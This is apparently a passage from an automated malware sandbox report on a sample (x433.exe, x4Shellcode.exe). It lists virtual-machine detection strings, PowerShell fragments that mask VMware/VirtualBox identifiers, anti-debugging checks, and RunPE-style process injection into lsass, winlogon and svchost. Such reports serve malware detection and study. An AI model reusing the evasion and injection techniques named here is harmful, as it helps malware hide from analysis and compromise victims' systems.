                      Source: Microsoft-Windows-PowerShell%4Operational.evtx.16.drBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
                      Source: svchost.exe, 00000008.00000002.2956012355.000002A66062A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                      Source: System.evtx.16.drBinary or memory string: VMCI: Using capabilities (0x1c).
                      Source: Microsoft-Windows-PowerShell%4Operational.evtx.16.drBinary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
                      Source: svchost.exe, 00000021.00000000.1866482937.000002644A62B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}1e
                      Source: x4usb.exe.2.drBinary or memory string: vmware
                      Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.16.drBinary or memory string: nonicNECVMWarVMware SATA CD00
                      Source: svchost.exe, 00000010.00000000.1798422088.000001D55862B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.2955107505.000001D55862B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor
                      Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.16.drBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
                      Source: svchost.exe, 00000021.00000000.1866560549.000002644A640000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000.ifo
                      Source: svchost.exe, 00000010.00000000.1800562780.000001D5592C3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dowvmci
                      Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.16.drBinary or memory string: VMware
                      Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.16.drBinary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                      Source: svchost.exe, 00000021.00000002.2948190504.000002644A62B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: Microsoft-Windows-PowerShell%4Operational.evtx.16.drBinary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
                      Source: svchost.exe, 00000021.00000000.1866915131.000002644A702000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: svchost.exe, 00000021.00000000.1866482937.000002644A62B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000,@
                      Source: x4host.exe, 00000002.00000002.3000681433.000000001C086000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllJJ
                      Source: Microsoft-Windows-PowerShell%4Operational.evtx.16.drBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))
                      Source: svchost.exe, 00000021.00000000.1866915131.000002644A702000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: lsass.exe, 00000007.00000002.2966297830.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
                      Source: svchost.exe, 00000021.00000000.1866482937.000002644A62B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.16.drBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
                      Source: dwm.exe, 00000009.00000002.3038914037.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000S
                      Source: Microsoft-Windows-Partition%4Diagnostic.evtx.16.drBinary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
                      Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.16.drBinary or memory string: storahciNECVMWarVMware SATA CD00
                      Source: lsass.exe, 00000007.00000002.2960383043.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744038298.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000000.1747028955.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2954846604.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000B.00000000.1781345340.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2948010267.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2949153556.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000C.00000000.1782563333.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000E.00000000.1786857019.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2962792700.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1798422088.000001D55862B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: lsass.exe, 00000007.00000002.2966297830.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
                      Source: svchost.exe, 00000021.00000000.1866482937.000002644A62B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: &@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: lsass.exe, 00000007.00000003.2270451721.00000202C037F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
                      Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.16.drBinary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
                      Source: Microsoft-Windows-PowerShell%4Operational.evtx.16.drBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
                      Source: svchost.exe, 00000021.00000000.1866482937.000002644A62B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: &@\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: svchost.exe, 00000010.00000002.2956365705.000001D558643000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@vmcitpA
                      Source: svchost.exe, 00000008.00000000.1747138035.000002A66065D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                      Source: svchost.exe, 00000017.00000000.1828228212.0000023FD3802000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                      Source: lsass.exe, 00000007.00000002.2966297830.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
                      Source: Microsoft-Windows-PowerShell%4Operational.evtx.16.drBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
                      Source: dwm.exe, 00000009.00000002.3038914037.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                      Source: C:\Windows\System32\dllhost.exeAPI call chain: ExitProcess graph end nodegraph_5-8180
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeCode function: 2_2_00007FFD9B887801 CheckRemoteDebuggerPresent,2_2_00007FFD9B887801
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_007A1361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_007A1361
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_00470594 mov eax, dword ptr fs:[00000030h]1_2_00470594
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_00761130 mov eax, dword ptr fs:[00000030h]1_2_00761130
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_007A3F3D mov eax, dword ptr fs:[00000030h]1_2_007A3F3D
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_00401868 GetProcessHeap,HeapAlloc,StrCpyW,StrCatW,StrCatW,StrCatW,StrCatW,StrCatW,StrCatW,1_2_00401868
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\dllhost.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_007A1361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_007A1361
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_007A4C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_007A4C7B
                      Source: C:\Windows\System32\dllhost.exeCode function: 5_2_000002D8B0A684D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_000002D8B0A684D4
                      Source: C:\Windows\System32\dllhost.exeCode function: 5_2_000002D8B0A6DBF4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_000002D8B0A6DBF4
                      Source: C:\Windows\System32\dllhost.exeCode function: 5_2_000002D8B0A68170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_000002D8B0A68170
                      Source: C:\Windows\System32\winlogon.exeCode function: 6_2_00000225DC64DBF4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00000225DC64DBF4
                      Source: C:\Windows\System32\winlogon.exeCode function: 6_2_00000225DC6484D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00000225DC6484D4
                      Source: C:\Windows\System32\winlogon.exeCode function: 6_2_00000225DC648170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00000225DC648170
                      Source: C:\Windows\System32\lsass.exeCode function: 7_2_00000202C0AEDBF4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00000202C0AEDBF4
                      Source: C:\Windows\System32\lsass.exeCode function: 7_2_00000202C0AE8170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00000202C0AE8170
                      Source: C:\Windows\System32\lsass.exeCode function: 7_2_00000202C0AE84D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00000202C0AE84D4
                      Source: C:\Windows\System32\svchost.exeCode function: 8_2_000002A661308170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_000002A661308170
                      Source: C:\Windows\System32\svchost.exeCode function: 8_2_000002A66130DBF4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_000002A66130DBF4
                      Source: C:\Windows\System32\svchost.exeCode function: 8_2_000002A6613084D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_000002A6613084D4
                      Source: C:\Windows\System32\dwm.exeCode function: 9_2_000002BAAE26DBF4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_000002BAAE26DBF4
                      Source: C:\Windows\System32\dwm.exeCode function: 9_2_000002BAAE2684D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_000002BAAE2684D4
                      Source: C:\Windows\System32\dwm.exeCode function: 9_2_000002BAAE268170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_000002BAAE268170
                      Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000026A879C84D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_0000026A879C84D4
                      Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000026A879CDBF4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_0000026A879CDBF4
                      Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000026A879C8170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_0000026A879C8170
                      Source: C:\Windows\System32\svchost.exeCode function: 11_2_00000179537A8170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00000179537A8170
                      Source: C:\Windows\System32\svchost.exeCode function: 11_2_00000179537A84D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00000179537A84D4
                      Source: C:\Windows\System32\svchost.exeCode function: 11_2_00000179537ADBF4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00000179537ADBF4
                      Source: C:\Users\user\Desktop\x433.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: 1.2.x4Shellcode.exe.4040b0.1.raw.unpack, RunPE.cs.Net Code: Run contains injection code
                      Source: 1.0.x4Shellcode.exe.4040b0.1.raw.unpack, RunPE.cs.Net Code: Run contains injection code
                      Source: 3.2.powershell.exe.21ffc670000.15.raw.unpack, RunPE.cs.Net Code: Run contains injection code
                      Source: 1.2.x4Shellcode.exe.4040b0.1.raw.unpack, Unhook.csReference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
                      Source: 1.2.x4Shellcode.exe.4040b0.1.raw.unpack, RunPE.csReference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
                      Source: 1.2.x4Shellcode.exe.4040b0.1.raw.unpack, RunPE.csReference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size2, 12288u, 64u)
                      Source: 1.2.x4Shellcode.exe.4040b0.1.raw.unpack, RunPE.csReference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, num3, IntPtr.Zero)
                      Source: 1.2.x4Shellcode.exe.4040b0.1.raw.unpack, RunPE.csReference to suspicious API methods: NtSetContextThread(thread, intPtr5)
                      Source: C:\Windows\System32\dllhost.exeCode function: 5_2_0000000140002434 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,OpenProcess,TerminateProcess,5_2_0000000140002434
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\winlogon.exe EIP: DC612A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\lsass.exe EIP: C0AB2A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 612D2A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\dwm.exe EIP: AE232A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 87992A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 53772A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 5D532A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 67D2A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 5B392A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: EBFD2A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 59042A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: A9E72A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 73162A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 4E862A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 473C2A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 6F9D2A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 83BC2A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: D3F72A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: A4152A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: BDF32A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: C0262A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: C9F32A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 644B2A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 7B2A2A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 4F62A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 2AB42A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 4ADB2A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\spoolsv.exe EIP: 1992A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 25DA2A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: F5352A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: F0D62A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: FFB2A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: C2572A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8BCE2A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 66902A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13EF2A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8D572A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 69B42A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CC742A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5DA72A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 199D2A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F3892A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3B82A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 40E42A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A6532A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27BC2A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B152A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 621A2A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F482A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8B4B2A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 683D2A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7DB2A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E262A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6C5E2A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D5932A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FC652A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 78742A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 33B42A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8D0A2A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AB4C2A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A642A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6CF32A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 641A2A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 49352A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 60DA2A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5E7B2A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A1602A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C4262A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F7C2A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E8152A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 52342A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9DA92A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 602E2A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 94D52A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F36C2A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E6B72A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 801F2A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 30221C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 71E62A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3ED21C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B9BA2A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E3382A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6DDB2A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A6972A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10121C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2AE21C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A621C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A921C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2DF21C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9E21C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EB21C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AA21C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FE21C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 31021C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2B921C3Jump to behavior
